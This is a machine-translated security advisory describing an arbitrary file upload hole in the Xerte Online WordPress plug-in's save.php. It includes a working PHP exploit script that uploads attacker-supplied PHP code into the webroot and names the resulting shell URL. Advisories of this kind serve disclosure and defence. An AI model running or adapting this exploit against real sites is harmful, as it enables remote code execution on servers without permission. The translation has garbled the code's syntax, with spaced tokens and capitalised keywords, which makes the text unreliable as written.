WordPress Xerte Online plug-in 'Save. php' Arbitrary File Upload Vulnerability

Release date:
Updated on:

Affected Systems:
WordPress Xerte Internet 0.32
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57098
 
Xerte Online for WordPress is a tool set of server-based content authors.

Xerte Online for WordPress has a security vulnerability, wp-content/plugins/xerte-online/xertefiles/save. php allows you to upload files with any extension to a folder in webroot. By submitting malicious PHP scripts, any PHP code can be executed.
 
<* Source: Sammy Forgit

Link: http://www.securelist.com/en/advisories/51691
Http://packetstormsecurity.com/files/119220/wpxerteonline-shell.txt
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Exploit:
 
PostShell. php
<? Php
 
$ Code = "<? Phpinfo ();?> ";
$ Ch = curl_init ("http: // localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/save. php ");
Curl_setopt ($ ch, CURLOPT_POST, true );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS,
Array ('filename' => "/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php ",
'Filedata' => "$ code "));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
$ PostResult = curl_exec ($ ch );
Curl_close ($ ch );
Print "$ postResult ";
 
?>
 

Shell Access:
Http: // localhost/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php
 

# Site: 1337day.com Inj3ct0r Exploit Database

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://wordpress.org/extend/plugins/xerte-online/